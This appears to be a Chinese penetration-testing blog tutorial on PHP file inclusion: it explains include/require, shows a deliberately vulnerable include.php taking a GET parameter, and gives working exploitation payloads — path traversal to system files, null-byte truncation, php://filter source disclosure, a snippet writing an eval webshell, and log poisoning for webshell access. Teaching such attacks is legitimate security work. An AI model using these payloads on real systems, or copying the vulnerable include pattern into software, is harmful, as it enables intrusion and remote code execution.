文件包含漏洞(概述、原理、特点、PHP中的文件包含漏洞、相关函数、本地/远程文件包含、漏洞利用、利用PHP封装协议、包含日志文件)

最新推荐文章于 2024-08-07 10:58:17 发布
最新推荐文章于 2024-08-07 10:58:17 发布
阅读量913 收藏 4
点赞数
分类专栏: 渗透测试 # OWASP TOP 10
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677119/article/details/111459258
版权

文章目录

文件包含漏洞

一、概述

程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。

漏洞原因:程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用任意文件,造成文件包含漏洞。

几乎所有的脚本语言都会提供文件包含功能。文件包含漏洞在PHP Web Application中居多,在JSP/ASP/ASP/. net程序中比较少。

二、PHP中的文件包含漏洞相关

1. PHP中的文件包含函数

1.1 include()

  1. 文件包含失败时,会产生警告,脚本会继续运行

  2. 示例

文件1:inc.php

<?php
echo "This is inc.php.";
?>

文件2:include.php

<?php
include("./inc.php");        // 写法一
echo "<h1>This is include.php</h1>";
include "./inc.php";        // 写法二
?>
  1. 运行结果

在这里插入图片描述

1.2 include_once()

  1. 与include()功能相同, 文件只会被包含一次

  2. 示例

文件1:inc.php

<?php
echo "This is inc.php.";
?>

文件2:include.php

<?php
include_once("./inc.php");     
echo "<h1>This is include_once.php</h1>";
include_once "./inc.php"; 
?>
  1. 运行结果

在这里插入图片描述

1.3 require()

  1. 文件包含失败时,会产生错误,直接结束脚本执行

  2. 示例

文件1:inc.php

<?php
echo "This is inc.php.";
?>

文件2:include.php

<?php
require("./inc.php");     
echo "<h1>This is require.php</h1>";
require"./inc.php"; 
?>
  1. 运行结果

在这里插入图片描述

1.4 require_once()

  1. 与require()功能相同,文件只会被包含一次。

  2. 示例

文件1:inc.php

<?php
echo "This is inc.php.";
?>

文件2:include.php

<?php
require_once("./inc.php");     
echo "<h1>This is require_once.php</h1>";
require_once"./inc.php"; 
?>
  1. 运行结果

在这里插入图片描述

2. PHP相关配置

文件包含是PHP的基本功能之一,有本地文件包含和远程文件包含之分(虽然php官网上不是这么解释的)。

本地文件包含就是可以读取和打开本地文件;
远程文件包含就是通过网络协议(http、ftp、PHP伪协议等)可以远程加载文件。

我们可以通过php.ini来进行配置。

allow_url_fopen=On/Off
// 本地文件包含(LFI),但这个无论On或Off,本地文件包含都存在
allow_url_include=On/Off
// 远程文件包含(RFI)

3. 漏洞示例

一共三个文件(inc.php、info.php、include.php)

3.1 本地包含示例

inc.php

<?php
echo "This is inc.php.";
?>

info.php

<?php
phpinfo();
?>

include.php

<?php
$path = $_GET['path'];   
echo "<h1>This is include.php</h1>";
inculde "$path";	
?>

运行结果:

在这里插入图片描述
在这里插入图片描述

3.2 远程包含示例

当我们php的配置 allow_url_include 为Off时

在这里插入图片描述

当我们php的配置 allow_url_include 为On时

在这里插入图片描述

4. 漏洞原理

PHP文件包含是程序设计的基础功能之一,能够减少代码量,提高开发效率。但是使用文件包含功能时,有类似于以上测试代码的设计,实现了动态包含,就有产生文件包含漏洞的风险。

如果实现动态包含的参数,Web应用没有进行严格净化,客户端用户可以影响或控制文件包含的路径,就会产生文件包含漏洞。

5. 漏洞特点

5.1 无视文件扩展名读取文件

包含文件时,PHP会读取文件的源码,包括图片文件。尝试包含图片,打开图片不是图像,而是以二进制形式打开的。

示例:在图片文件的详细信息的版权里注入php代码。

在这里插入图片描述

5.2 无条件解析PHP代码

文件包含在读取文件源码的同时,如果遇到符合PHP语法规范的代码,就会无条件执行。
如,将info. php的后缀名改成info. rar,依然能够显示phpinfo()信息。

在这里插入图片描述

6. 空字符安全绕过

空字符安全限制绕过,是PHP小于5.3.4 版本的一个漏洞,CVE编号是CVE-2006-7243。这个漏洞就是PHP接收来自于路径名中的空(Null)字符,这可能允许依赖于上下文的攻击者通过在此字符后放置安全文件扩展名来绕过预期的访问限制也就是我们之间讲过的00截断。

  1. 调整PHP版本;

  2. index.php文件

<?php
if(isset($_GET['path'])){
	include $_GET['path'].".html";
}else{
	echo "?path=[path]";
}
?>
  1. test.html
<h1>Hello,%00</h1>
  1. 测试访问

在这里插入图片描述

  1. 加上%00,测试访问info.php
    发现它为我们自动转义

在这里插入图片描述

解决:需要关闭php的魔术引号,在php的配置文件中

在这里插入图片描述

结果:

在这里插入图片描述

这是php的低版本中的漏洞,高版本已将它去除!

三、漏洞利用

1. 读取敏感文件

我们可以利用文件包含漏洞读取任意文件,读取文件的时的条件:

  1. 知道目标主机文件存在(目标文件的路径,绝对路径,相对路径);
  2. 具有文件可读权限。

示例

方法一:?path=c:\windows\System32\drivers\etc\hosts

在这里插入图片描述

方法二:先返回当前盘符的根,?path=..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts

2. 直接包含图片木马

可以利用文件包含漏洞直接包含图片木马,使用菜刀连接。

示例

在这里插入图片描述

中国蚁剑连接:

在这里插入图片描述

3. 包含木马写Shell

我们也可以将如下代码写入到图片中

<?php 
fputs(fopen( 'shell.php', 'w' ),"<?php @eval(\$_REQUEST['cmd'])?>");
?>

该段代码的含义是,在当前目录下创建一个名为 shell. php 的文件,内容为一句话木马,当我们直接包含图片的时候,这段代码就会被执行。

4. 利用PHP封装协议

4.1 访问本地文件

我们可以使用php的file协议访问本地系统文件,提交参数:

?path=file://c:\windows\System32\drivers\etc\hosts
4.2 传输PHP文件

利用下面参数传送任意PHP文件,然后base-64解码即可:

?path=php://filter/read=convert.base64-encode/resource=文件路径

在这里插入图片描述

解码可得:

在这里插入图片描述

4.3 执行PHP命令

在这里插入图片描述

5. 其他利用

已知一个网站存在本地文件包含漏洞,没有文件上传API,如何利用?

包含本地日志文件
  1. 获取日志文件的路径(常识、爆破);
    如php的日志文件:\Apache\logs\error.log

拦截数据包,注入一句话木马

在这里插入图片描述
在这里插入图片描述

读取日志文件:

?path=日志文件路径
  1. 蚁剑成功连接。

在这里插入图片描述

Tigirs
关注
专栏目录
文件包含原理及本地文件包涵漏洞案例演远程文件包含漏洞案例讲解和演文件包含漏洞文件上传漏洞利用
qq_44696653的博客
05-12 1250
文件包含原理及本地文件包涵漏洞案例演 一、文件包含漏洞概述(摘录) 在web后台开发,程序员往往为了提高效率以及让代码看起来更加简介,会使用“包含函数功能。比如把一系列功能函数都写进fuction.php,之后当某个文件需要调用的时候就直接在文件写上一句<?php include fuction.php?>就可以调用函数代码。 但有些时候,因为网站功能需求,会让前端用户选择...
文件包含漏洞-01】文件包含漏洞成因与其包含语句及其相关配置
cc
02-21 3052
tips:当服务器开启allow_url_include选项时,就可以通过php的某些特性函数[include(),require(),include_once(),require_once()]利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。,页面显如下,可以看到在require语句界面,第一条require语句成功执行,但是第二条语句执行出错,显警告,也出现报错致命错误,程序终止,导致后续 脚本无法执行!,网页显如下,可以看到语句被成功执行!
IEC104规约解析c++源码
01-04
IEC104 规约 解析 vc++ 源码
C++代码审阅--ice104协议从站(1)
Hughier的博客
11-11 1148
stdafx.h stdafx的英文全称为:Standard Application Framework Extensions(标准应用程序框架的扩展) 文库解释 介绍 编译器通过一个头文件stdafx.h来使用预编译头文件。stdafx.h这个头文件名是可以在project的编译设置里指定的。编译器认为,所有在指令#include "stdafx.h"前的代码都是预编译的,它跳过#include "stdafx. h"指令,使用projectname.pch编译这条指令之后的所有代码。 因此,所有的MFC
文件包含漏洞全面详解
最新发布
weixin_42340783的博客
08-07 1441
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
创建自己的函数
Se11en`s Spirit of Tech
03-14 2395
 根据函数库使用的类型可以把函数库分为两大类,即静态函数库(Static Library)和动态函数库(Dynamic Library)。 Tips-1:Linux下的库文件命名有一个规定:必须以lib三个字母开头Tips-2:Linux标准系统库文件一般储存在/lib和/usr/lib目录。 静态函数库(Static Library)扩展名:libxxx.o
怎样建立自己的函数
weixin_33840661的博客
01-23 509
参考 : c函数库http://www.code365.com/programe/c/hs/list_1.htm自定义函数库的方法及应用: 一、2个相关的命令 1、TCC——TC的DOS下的命令行编译连接工具 2、TLIB——TC的DOS下的库操作工具 二、1个自定义的函数库的例子 1、 在TC集成环境下,编一个文件USERADD.C #define _NO_MAIN int add(int *a...
自己写函数
yuanlanjun
06-29 178
大家现在写程序,是不是都是用新唐提供的函数库?在体验开发板的一开始,我也是使用函数库,毕竟这个太方便了。 可是有一天,我发现一个只使用时钟和IO以及调试串口的程序居然查过了16k的时候,我震惊了!!!天啊,这么一个简单的功能,需要这么多的程序空间吗??? 抱着怀疑的态度,我读了新唐提供的库。看完后,一个字:大!这个大是指功能全,副作用就是代码太多了,生成的程序代码当然就小不下来。 我把学51...
08_理论8_文件包含漏洞原理与实践_20180921
02-10
#### 一、文件包含漏洞概述 文件包含漏洞是一种常见的Web应用程序安全漏洞,尤其在使用PHP语言开发的应用程序较为普遍。这种漏洞允许攻击者通过控制程序用于指定要包含文件的参数,来读取系统上的任意文件,...
php 伪造本地文件包含漏洞的代码
10-28
3. **使用函数替代**:尽可能使用`file_get_contents()`等内置函数代替`include`或`require`,并确保正确设置上下文选项以防止远程文件包含。 4. **限制文件权限**:减少应用程序对服务器文件系统的访问权限,尤其是...
通达OA文件上传与文件包含漏洞引发的RCE分析
"通达OA任意文件上传配合文件包含导致的RCE影响多个版本,包括V11版、2015-2017版、2013版以及2013增强版。利用漏洞,攻击者可以通过Python等脚本执行命令,如`python3.pyhttp://10.0.0.1:81whoami`,获取服务器...
电力通信规约104规约Demo版_C++
03-18
这是一个电力通信规约104规约Demo版,此DEMO仅配置了部分的ASDU数据对象,用户可以根据需要,参照例程自行配置所需要的各种数据对象。
函数库(自己用C写的函数库)
10-07
部分自己写的,部分来自于公司的函数库,用在大家的项目可以省不少时间,提倡代码面前人人平等
电力协议104
08-13
本程序实现电力104协议,包括遥信,遥测,遥控,等功能。这个是测试程序,有bug,请注意修改。
IEC104从站 C++源码 可以直接编译使用
02-13
IEC104协议服务器从站MFC源码,可直接运行。104协议测试客户端,辅助协议测试。
QT+c++编写的IEC104通讯源码
08-17
QT+c++编写的IEC104通讯源码,模拟IEC04通讯流程,对于初学者还是很有帮助的!
一文教你如何构建自己的函数
Leon的博客
03-22 3187
话说ISOC99有自己的一系列标准C函数库,例如我们熟悉的libc.a(包含标准I/O函数、字符串操作函数和整数数学函数)和libm.a(浮点数数学函数),可供我们在使用gcc编译工具编译程序时调用。那么,如果我们在日常学习或项目开发积累了许多好的函数,希望日后在其他项目能够复用时,我们又该如何去保存他们呢?今天我就告诉大家怎么办? 1. 看gcc编译器都干了些什么? 所谓,知...
c语言怎样写好自己的库函数,自己动手写字符串库函数 一(C语言实现)
weixin_39932939的博客
05-23 554
在coding最常使用的就是对于字符串的处理问题,接下来我们自己动手写库函数,尽量使用指针操作,而不是数组操作//头文件 string.h#include #include //字符串结构体typedef struct CString{char* str;int len;}string;//初始化void Init(string* str);void Init_With_Len(string* ...
c语言学习零碎整理(8):看一个标准的库函数是怎么写的
wayne 我的陋室我做主
11-21 3066
char * strcpy( char *strDest, const char *strSrc )  {    assert( (strDest != NULL) && (strSrc != NULL) );    char *address = strDest;      while( (*strDest++ = * strSrc++) != ‘/0’ )           ;    ret
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值